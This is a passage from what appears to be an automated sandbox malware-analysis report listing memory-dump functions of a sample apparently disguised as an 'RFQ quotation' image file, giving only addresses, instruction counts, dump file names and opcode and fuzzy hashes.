                          • Instruction Fuzzy Hash: 87016736340215AFDB109F59DC84F9EB7A9FB99721F108066FA15CB390C6B2DD149B50
                          Function 063E1B95 Relevance: .0, Instructions: 50COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111378217.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: true
                          • Associated: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6380000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7831fe1ab84aeaddc26f32f623f49ec940b40fd142159b17cd33ab7bb6a4294e
                          • Instruction ID: 59fb79e025d86848e5551fcc1981f68053917e6d5b132c3efc820bc59b954bea
                          • Opcode Fuzzy Hash: 7831fe1ab84aeaddc26f32f623f49ec940b40fd142159b17cd33ab7bb6a4294e
                          • Instruction Fuzzy Hash: 8921E474A55229CFCB65DF24C894BADB7B6FB48200F1045E9E40DA7394CB34AE80CF50
                          Function 063E1B4B Relevance: .0, Instructions: 50COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111378217.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: true
                          • Associated: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6380000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f3a37d39dbd167da4601f8a0d46cfe449d6cbabf44f5b70e526a6694db20c180
                          • Instruction ID: 2191742aa8b8f9947987ac538edde167a9245379e9a2b54a0f4faf594c65f82d
                          • Opcode Fuzzy Hash: f3a37d39dbd167da4601f8a0d46cfe449d6cbabf44f5b70e526a6694db20c180
                          • Instruction Fuzzy Hash: B421D574A552298FCB65DF24C894BADB7B6FB88200F1045E9D40DA7395CB345E80CF50
                          Function 063E1BFE Relevance: .0, Instructions: 48COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111378217.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: true
                          • Associated: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6380000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5d8c52be05db33439b63e0693921ee7e3feffc0779bb1abb33ad86bf6a73374a
                          • Instruction ID: 4fc2edb7c3be0e1e2ca54ad11408c9e13d759c5faf21958c797f88c4a0a9f7c5
                          • Opcode Fuzzy Hash: 5d8c52be05db33439b63e0693921ee7e3feffc0779bb1abb33ad86bf6a73374a
                          • Instruction Fuzzy Hash: 7B21E574A1022A8FCB61DF24C894BADB7B6FB89200F1085D9D50DA7394CA349E80CF51
                          Function 0650E10F Relevance: .0, Instructions: 47COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 29e7cd4f07f7e9e4c7691a3ea12a39f04c4314fd8c7260bcf267d271fd73b68b
                          • Instruction ID: 049d6ae5291e80796d71feec42942f833086e4ea7df714c50a5903385acb2761
                          • Opcode Fuzzy Hash: 29e7cd4f07f7e9e4c7691a3ea12a39f04c4314fd8c7260bcf267d271fd73b68b
                          • Instruction Fuzzy Hash: 5801F776C02208DFDB81CFE4E4025EDBBB0FF94320F10449BD445E7241D9315A108B91
                          Function 06546587 Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2bc9f73151eb35e8ece6ca37ac5fda5cc0c12ef7dae214e70c280cd57c5d535b
                          • Instruction ID: bec5ef6f85df10d06584dbcaa27c18f67703d66fbf7d0fc0795b29e9d123b643
                          • Opcode Fuzzy Hash: 2bc9f73151eb35e8ece6ca37ac5fda5cc0c12ef7dae214e70c280cd57c5d535b
                          • Instruction Fuzzy Hash: 5B011774D09208DFCB94DFA8D4446ECBFB1EF4A214F2081EAD80997212D2349E11CF80
                          Function 0650FC48 Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c065ca307abc49e2bb9698c69b24db3da1335521a849433b0fa325a1a62c210f
                          • Instruction ID: 7bb690582d6bfbf537d30d836819a5e35f493b99d06409a336e5ea15942e405e
                          • Opcode Fuzzy Hash: c065ca307abc49e2bb9698c69b24db3da1335521a849433b0fa325a1a62c210f
                          • Instruction Fuzzy Hash: 041145B4D09249AFDB40CFA8D9019AEBBB5BF49300F1080AAEC54A3251D7308A40DF90
                          Function 06549D29 Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5fdaea934f39b223e900ae56a0bbe4b77ab227e4fb0e7b7b13aaa01b1cb0de1b
                          • Instruction ID: b5e8d80fff9d18a0026fa79660494397bd64892df563c171f733d1c85d4e797f
                          • Opcode Fuzzy Hash: 5fdaea934f39b223e900ae56a0bbe4b77ab227e4fb0e7b7b13aaa01b1cb0de1b
                          • Instruction Fuzzy Hash: 3901F432B052116FD3119A689845B6BFBB9EFC9320F2940AAE809DB351D775AC41CBD0
                          Function 063E1BDC Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111378217.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: true
                          • Associated: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6380000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 38feca8cb87646afe5fffd807394de7d7d63cf2babbcf5993364eb42909e45ac
                          • Instruction ID: c14c7b1050c5805e4b76bed11dd3e124a8db35bc9ea4d5e72b869a55c06a3efd
                          • Opcode Fuzzy Hash: 38feca8cb87646afe5fffd807394de7d7d63cf2babbcf5993364eb42909e45ac
                          • Instruction Fuzzy Hash: F811C674A5522A8FC765DF18D894BAEB7B6FB48300F2081D9D40DA7795C734AE80CF90
                          Function 063E1A04 Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111378217.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: true
                          • Associated: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6380000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7c0f8b2f34b4da9e0d03ebe91461beac35e1a67b282473ef75714be979ef3a4d
                          • Instruction ID: c06a8196ab5dd8d8586f3393d22c43a216ac9dd146f8ac12e33b6f72a24600f5
                          • Opcode Fuzzy Hash: 7c0f8b2f34b4da9e0d03ebe91461beac35e1a67b282473ef75714be979ef3a4d
                          • Instruction Fuzzy Hash: 1D11C974A5522A8FCB65DF14D894BADB7B6FB48300F2081D9D40DA7795C734AE80CF90
                          Function 014140A4 Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 737749985d6b81c83da8fd33f5fde7c8150344ada2b1f42ac057e4d77367e346
                          • Instruction ID: efb5224a12774ce58af8b0e7b0cb10b24596a8fff51aea1e6666803a7d4c371c
                          • Opcode Fuzzy Hash: 737749985d6b81c83da8fd33f5fde7c8150344ada2b1f42ac057e4d77367e346
                          • Instruction Fuzzy Hash: 0E113975A00219CFDB14CBA9D640ADEBFF2BF88301F24846AD505BB295CB759D41CB60
                          Function 06501B28 Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db3b72a3b80f856f9b46e309947fd7e88b43fd6916b7f5b760193371f87ce1a0
                          • Instruction ID: fd389b982d25b09a70710d05a78c9b20993655129e7aced4b601ecf7d5144db2
                          • Opcode Fuzzy Hash: db3b72a3b80f856f9b46e309947fd7e88b43fd6916b7f5b760193371f87ce1a0
                          • Instruction Fuzzy Hash: B901D4317007049FD368AB78D458A3A77A2FBC9360F10896CE5168B7D0DB71EC42CB91
                          Function 0650FC58 Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d44717f3a79cbfd7ea1a5b7fab695b63a52bb67a6ee7f6ac24c778d2e5a30987
                          • Instruction ID: 6b9560731091e97029c37ab2275ba0557cb929061e999b23977f5c73a8a66739
                          • Opcode Fuzzy Hash: d44717f3a79cbfd7ea1a5b7fab695b63a52bb67a6ee7f6ac24c778d2e5a30987
                          • Instruction Fuzzy Hash: BD01C2B4D08219EFDB84DFA9D9419AEBBB9FB49300F10846AEC54A3351D7349A50DF90
                          Function 06832CAF Relevance: .0, Instructions: 40COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 880e75cc62eb79ffeb5b3e45b3a581d8ee7b911f332b840ee46743a6ad2a03ae
                          • Instruction ID: 7747fa1ddbaa3d20bab7c65160a7f8e022ff7bdfb24fde0d1dc5b4f171b40aa8
                          • Opcode Fuzzy Hash: 880e75cc62eb79ffeb5b3e45b3a581d8ee7b911f332b840ee46743a6ad2a03ae
                          • Instruction Fuzzy Hash: 85119D74A00629CFDBA5DF68CC48BDAB7B1BB88306F1144E99509A7740DB389E84CF50
                          Function 0650EFB2 Relevance: .0, Instructions: 40COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 85cc97fbb5b12738d0c31bae5d097fd0e903c557b993e54a686149f798f481ac
                          • Instruction ID: 751506cfafaf5f2392cd38066abf50fae2a67e31ac78e8e171bce7dec60f5304
                          • Opcode Fuzzy Hash: 85cc97fbb5b12738d0c31bae5d097fd0e903c557b993e54a686149f798f481ac
                          • Instruction Fuzzy Hash: E3110C74A012198FEB54CF64E984BAE77F6FB49300F1081A6E509AB294DB749D45CF50
                          Function 06503168 Relevance: .0, Instructions: 40COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 056da5b826fc2a47edc1ff542ba978df0fe022f7ee4a11974daf70f87f7673bb
                          • Instruction ID: ff51e3abaa85721028124dda3af8ea6e7b7b87988f589d8492a21324ded57553
                          • Opcode Fuzzy Hash: 056da5b826fc2a47edc1ff542ba978df0fe022f7ee4a11974daf70f87f7673bb
                          • Instruction Fuzzy Hash: 16F059213083662BE75612288C1877F3A9A9BC5500F04002BEA01C72C2DF68CD0383E2
                          Function 0684F878 Relevance: .0, Instructions: 39COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eded54c2a792a24a38e009631bf88d469465dcedc0768423e1f239b2ee678424
                          • Instruction ID: 83898ec68c90b6a9d7107b96741babdaae602a07cbcb71648043cf46e8fcb1e4
                          • Opcode Fuzzy Hash: eded54c2a792a24a38e009631bf88d469465dcedc0768423e1f239b2ee678424
                          • Instruction Fuzzy Hash: 81018139300620DFC3099B68E41891EB7E7EBCC7117108129EB068B390CF31EC02CB94
                          Function 06549D90 Relevance: .0, Instructions: 38COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7b8a129a3f604a0ad24ff022a67559265cd71a3efbaec5437445efe536622e3e
                          • Instruction ID: 48593d8d7574fb1c30de1dc3d986f4566cdf9f6302492b4bbae7227d91008c4c
                          • Opcode Fuzzy Hash: 7b8a129a3f604a0ad24ff022a67559265cd71a3efbaec5437445efe536622e3e
                          • Instruction Fuzzy Hash: 01F02473B0D2901FE352267858563267BE1EB96208F1804DBC0868F2A3DA569802C390
                          Function 06835DFA Relevance: .0, Instructions: 38COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 090ea967fe798f78ad7c55fa7d6c61474487e2154cb3783d79a71809c0f1fba9
                          • Instruction ID: cf520e94241309897a7aded7defd1ca49d5cccfdd51993ecde5878aa098789ad
                          • Opcode Fuzzy Hash: 090ea967fe798f78ad7c55fa7d6c61474487e2154cb3783d79a71809c0f1fba9
                          • Instruction Fuzzy Hash: CC11D374D04269CFDBA49F24C8887EDB7B0FB19305F0149EA9519A7681D7784EC8CF81
                          Function 0650DB55 Relevance: .0, Instructions: 38COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b0d35ee1e7e2fc3eec4d45ab2826815f61ab4be89332d06274b581824788a3ed
                          • Instruction ID: 2a9d7ab51e10207cdd93005cebd549eec8e6ef7f3a2436fb73310792371f260e
                          • Opcode Fuzzy Hash: b0d35ee1e7e2fc3eec4d45ab2826815f61ab4be89332d06274b581824788a3ed
                          • Instruction Fuzzy Hash: C411FA74A00214DFEB54CF28E998BA977B2FF49300F5085AAD10AAB644DB749E85CF40
                          Function 06549D38 Relevance: .0, Instructions: 37COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7b6b1036931c06435e850450c3fab6b2e2031c799442aff25b7a378ffe433806
                          • Instruction ID: df5f35beca84151884946ea0358c0a8aa9819403b16f75c403ed4c4e79d99c28
                          • Opcode Fuzzy Hash: 7b6b1036931c06435e850450c3fab6b2e2031c799442aff25b7a378ffe433806
                          • Instruction Fuzzy Hash: EDF05932F042101FE31456189804B2BF7E9EBC8320F140469E50D9B351CB72AC408BC4
                          Function 0650CDCD Relevance: .0, Instructions: 37COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e01f5e322cec611dcab5bc31d3f03c72b53874c3f4b0d8b163fbbc698eabc9cb
                          • Instruction ID: 10504d0d4895759162c488d24009484e9c13a963934549b3e206a8e1d7855deb
                          • Opcode Fuzzy Hash: e01f5e322cec611dcab5bc31d3f03c72b53874c3f4b0d8b163fbbc698eabc9cb
                          • Instruction Fuzzy Hash: EC110934A012149FEB94DF28E998B9973F2FF4A300F5085A9D50AAB354DB74AD85CF40
                          Function 014109B0 Relevance: .0, Instructions: 37COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8234f27f379d706988c8a3650da56b968d77a01c8c4931a483f5dbe035faef88
                          • Instruction ID: 13718a7fd43980eccfacf88c392b5110d7ec79d046d0e08c7427adac0f7d4065
                          • Opcode Fuzzy Hash: 8234f27f379d706988c8a3650da56b968d77a01c8c4931a483f5dbe035faef88
                          • Instruction Fuzzy Hash: 0D018172A105658FCB24EB64D4597ED7BF2AB98300F24046EE042FB395DF790E408BA5
                          Function 0654BFF2 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1edfc092c2d401334e22dc7bf2546072c0383d050e7b732ea4fd472b596d78f9
                          • Instruction ID: d96aa9c5694dcc8aca27ede38436dea4a40cff853cf4d37e00803ca395fa55d4
                          • Opcode Fuzzy Hash: 1edfc092c2d401334e22dc7bf2546072c0383d050e7b732ea4fd472b596d78f9
                          • Instruction Fuzzy Hash: 35F0E970A09218AFD716EB65E8586DD7FBAEB81214F1880D6E049D3150D7740E85CBD0
                          Function 06507359 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8697abb82407df644704648aa972271cc6a9de5fdd38dca2ac1f7566be56e562
                          • Instruction ID: c0c9b782c7baac7056ed8bd44c392cf1ef24887b845a5547ec83ad59719ad165
                          • Opcode Fuzzy Hash: 8697abb82407df644704648aa972271cc6a9de5fdd38dca2ac1f7566be56e562
                          • Instruction Fuzzy Hash: AFF0B43184A248DFE781CFA4D4406ADBBB8FB0E204F2414E9D808C7282D636EA10CB50
                          Function 06503141 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3fc0589f14bad62eace269647db405329cc1db84adfc7eae63635ec46714724d
                          • Instruction ID: 6b2c7f10c887b2ee2cdba7263fd8d7189a734f51c854536f728abbc53dac9502
                          • Opcode Fuzzy Hash: 3fc0589f14bad62eace269647db405329cc1db84adfc7eae63635ec46714724d
                          • Instruction Fuzzy Hash: 6BF0A0353052249FEB457720991497F37ABEBC9611B00802AE602CA2C6DE758C1387E5
                          Function 06546651 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8144fea67b88bc6912a346c1ab5d19d8950af203bb7bf691b1cb93ef36bbc291
                          • Instruction ID: 7b762e534b42c63e3b52003b2c9651b379a539a9042d1c11f39d244b5e344e09
                          • Opcode Fuzzy Hash: 8144fea67b88bc6912a346c1ab5d19d8950af203bb7bf691b1cb93ef36bbc291
                          • Instruction Fuzzy Hash: 2CF0EC3044B2489FCB51EFD8EC44BB97F78EB47224F1451D6E44993191C6354D51CB95
                          Function 065B00FB Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112321769.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65b0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f37f1e25dbe69a0680b226e5aa650c7c55a64c7699f71e1a800b4b8d7317f034
                          • Instruction ID: 1de5a6e57b5b786ced75009e549f32abc7bd7e2ab1b43b905f227b93624157f5
                          • Opcode Fuzzy Hash: f37f1e25dbe69a0680b226e5aa650c7c55a64c7699f71e1a800b4b8d7317f034
                          • Instruction Fuzzy Hash: B3014671901258DFDB51CF94DC81BDABBB9BB05314F1445DAE109AB181D7709A89CF60
                          Function 0650AB40 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6a318c6937534d1e440699a51007ed9476e40a62ba64bc37d197b466df21b9f1
                          • Instruction ID: 627086fd1cf63d2383ad52e44d509d51fa496d4e4b103943d400231a95751c1b
                          • Opcode Fuzzy Hash: 6a318c6937534d1e440699a51007ed9476e40a62ba64bc37d197b466df21b9f1
                          • Instruction Fuzzy Hash: 80F06D71D06208EFC781DFE4D8019ADBBB4FF9A210F2081EAD84897252DA368E11EB51
                          Function 0654DC70 Relevance: .0, Instructions: 34COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ce3c4f71c62324cd670b2aa27cff88fa4b0be820a9a954efa0cbb229c5c8d677
                          • Instruction ID: aa953ba586278c15fa3a5fd456c72c1a804dd3d0892b14628b69d68ccf9b41e0
                          • Opcode Fuzzy Hash: ce3c4f71c62324cd670b2aa27cff88fa4b0be820a9a954efa0cbb229c5c8d677
                          • Instruction Fuzzy Hash: D0F06732A44219ABDB24EAA4C855ADEBBF6BF89300F1049AAD40277340CB7529058BA1
                          Function 06549389 Relevance: .0, Instructions: 34COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ae6557dbd098e4fea30bd380af2979de40bd52475b6d22d6d06594aa8dd67fca
                          • Instruction ID: 9321c12c60130817db2fa50d3353bcf7b0c03ba240fc65eaab421c4806176e23
                          • Opcode Fuzzy Hash: ae6557dbd098e4fea30bd380af2979de40bd52475b6d22d6d06594aa8dd67fca
                          • Instruction Fuzzy Hash: 1AF05E71A45208EFCB41DF64E945E997B79EB06315F1041D8E80C8B2A2D672EE11DB91
                          Function 06544114 Relevance: .0, Instructions: 34COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 61aa4eb385abe542bf46209a86e3b7f98ac5dd2be476622200cfb6dd5ca1d325
                          • Instruction ID: 6e0210f27444039b3809c4a030305522ae9fc6165ad941d5ca74a02362f2bf7a
                          • Opcode Fuzzy Hash: 61aa4eb385abe542bf46209a86e3b7f98ac5dd2be476622200cfb6dd5ca1d325
                          • Instruction Fuzzy Hash: 0A11A274A4452A9FDBA4DF68CC54BAABBB1FF89301F1140F9941AA7254DB345E84CF40
                          Function 065B16F0 Relevance: .0, Instructions: 34COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112321769.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65b0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 60b075dfc689a660297261db70b5cb8be006cf79fe2d4312a4a7cae175e9fcee
                          • Instruction ID: 344a67924774e843622a18e0d54603af40cc5d4dee0336045173ada324762ce1
                          • Opcode Fuzzy Hash: 60b075dfc689a660297261db70b5cb8be006cf79fe2d4312a4a7cae175e9fcee
                          • Instruction Fuzzy Hash: 17F06D35805248EFCB45CFA4D8509ADBFB5EF4A310F1480DAE8549B252C2719A25EF90
                          Function 06547E88 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
